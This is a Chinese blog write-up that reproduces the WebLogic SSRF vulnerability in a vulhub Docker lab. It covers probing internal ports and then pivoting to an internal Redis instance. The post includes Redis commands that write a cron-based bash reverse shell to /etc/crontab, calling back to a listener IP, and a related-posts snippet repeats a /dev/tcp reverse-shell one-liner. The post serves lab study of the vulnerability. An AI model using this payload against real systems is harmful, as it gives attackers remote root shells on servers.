WebLogic SSRF 漏洞复现(Radies 反弹)

最新推荐文章于 2024-08-06 22:20:29 发布
最新推荐文章于 2024-08-06 22:20:29 发布
阅读量77 收藏
点赞数
分类专栏: 漏洞复现 # SSRF 文章标签: 安全 web安全 笔记 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134481432
版权

WebLogic SSRF 漏洞复现

环境搭建

vim docker-compose.yml

version: '2'
services:
 weblogic:
   image: vulhub/weblogic:10.3.6.0-2017
   depends_on:
    - redis
   ports:
    - "7001:7001"
 redis:
   image: vulhub/baselinux:centos-6

sudo docker-compose up -d

漏洞复现

端口探测

image-20231118164223415

搭建成功后访问

kali的ip:7001/uddiexplorer/SearchPublicRegistries.jsp

漏洞点存在于此网页

image-20231118164526747

点击 serach,抓包

image-20231118165853663

更改请求的 url,查看回显

image-20231118171447416

访问开启的端口报错

如果访问的非http协议,则会返回did not have a valid SOAP content-type

image-20231118171946014

访问关闭的端口报错

image-20231118172030997

Radies 反弹 shell

查看 Radies ip,Radies 数据库默认端口为 6379

sudo docker ps -a

sudo docker exec -it d250fa8fcafa ip addr

image-20231118173451492

访问该端口,报错信息表示端口开启

image-20231118173922351

编写反弹 shell 脚本

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.47.101/8888 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

image-20231118181000788

url 编码,发送

image-20231118181050203

kali 开启监听

image-20231118175941588

image-20231118181213847

成功反弹

image-20231118181241390

gjl_
关注
专栏目录
WebLogic SSRF 及漏洞修复
11-25
### WebLogic SSRF 及其漏洞修复方法 #### 一、背景介绍 WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。...
window和linx环境 radis安装详细步骤
占星安啦的博客
01-29 848
1、redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hashs(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支...
radis安装
weixin_38120374的博客
06-07 882
redis学习:安装命令:wget http://download.redis.io/releases/redis-4.0.2.tar.gztar zxf redis-4.0.2.tar.gzcd redis-4.0.2/makemake testsudo make install   #默认安装在/usr/local/bin目录下                    #也可以自定义安装目录安装...
WebLogic】常见漏洞复现
最新发布
m0_59151303的博客
08-06 830
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Redis之介绍、下载安装
weixin_52690231的博客
03-16 611
Redis之介绍、下载安装
理解:Redis作用
 
11-07 335
自己的疑问,自己的理解。 Redis 是干啥的? Redis是一个用于缓存数据库热点数据的nosql数据库,它在内存中做数据的存储。特点是比传统数据库的读写速度快。由于内存存储数据,状态是瞬时数据,数据安全性不高,需要通过持久化来保证数据的可恢复性。 Redis 缓存的是热点数据。如何保证缓存的数据是热点数据? 如果没有缓存预热,第一次查询时将缓存的数据设置过期时间,每次查询数据库都刷新/重置这个过期时间,那么热点数据的过期时间会经常的刷新和重置,最终 冷数据 不被经常查询到达过期时间就从缓存中淘汰掉。
Weblogic历史漏洞复现
m0_53183117的博客
02-27 1692
Weblogic历史漏洞
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
weblogic 漏洞统计 CVE
09-18
然而,如同任何复杂的软件系统,WebLogic也存在安全漏洞,这些漏洞可能被恶意攻击者利用,对服务器造成严重威胁。以下是所提及的一些CVE(Common Vulnerabilities and Exposures)编号以及它们涉及的安全问题: 1. ...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
漏洞复现WebLogic中间件漏洞
qq_48368964的博客
08-06 1073
WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。
【Redis】Redis的主从复制架构介绍与部署
qq_41369191的博客
05-09 151
目录 介绍 node02,node03解压redis压缩包到指定目录 安装C程序运行环境 node02,node03进行编译redis node02,node03修改redis配置文件 启动redis 查看redis是否启动 连接redis客户端 介绍 在Redis中,用户可以通过执行SLAVEOF命令或者设置slaveof选项,让一个服务器去复制(replicate)另一个服务器,我们称呼被复制的服务器为主服务器(master),而对主服务器进行复制的服务器则被称为从服务器(sl
Weblogic ‘wls-wsat‘ XMLDecoder 反序列化漏洞 CVE-2017-10271 漏洞复现
Senimo
08-02 652
Weblogic 'wls-wsat' XMLDecoder 反序列化漏洞 CVE-2017-10271 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 Weblogic 的 WLS Security 组件对外提供 webservice 服务,其中使用了 XMLDecoder 来解析用户传入的 XML 数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 二、漏洞影响 Weblogic < 10.3.6 三、漏洞复现 1、环境搭建 c
Weblogic反序列化漏洞(CVE-2018-2628)实现反弹shell
Becktick的博客
04-25 2047
Weblogic反序列化漏洞(CVE-2018-2628)反弹shell 技术无罪,请勿用于恶意用途 转载请注明出处! 看见大部分复现教程都是弹计算器,创建文件夹,对于一些人来说不能满足需求,所以我准备做一个反弹shell的复现。 测试机:MacBook-Air 测试机IP:192.168.0.100 靶机IP:192.168.0.100:7001 环境: docker 工具:CVE-2018-2...
WebLogic SSRF漏洞攻击内网Redis以及反弹shell
SoulCat
02-08 3768
WebLogic SSRF漏洞攻击内网Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器,首先判断redis(内网ip和端口),由于Redis是通过换行符来分隔每条命令,可以通过传入%0a%0d来注入换行符,发送redis命令,将弹shell脚本写入/etc/crontab中(crontab是一个linux一个定时执行事件的一个程序),然后getshell。 基本...
linux下反弹shell的几种方法
热门推荐
Radiation's Blog
03-20 1万+
反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01—使用bashbash -i >& /dev/[tcp|udp]/10.1.1.19/8080 0>&1 注:该命令使用的是系统原生bash,[tcp|udp]是要使用的协议,一般选择tcp就行,10.1.1.19是你要反弹到的地址,如果要反弹到你的电脑上
dedis&weblogic ssrf利用redis未授权反弹shell
Feng_Blue_的博客
10-27 438
本文仅提供于学术探讨,如有后果自行承担。 redis数据库未授权访问漏洞复现 启用漏洞环境 借助工具来进行操作 查看基本帮助 weblogic ssrf利用redis未授权访问反弹shell
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值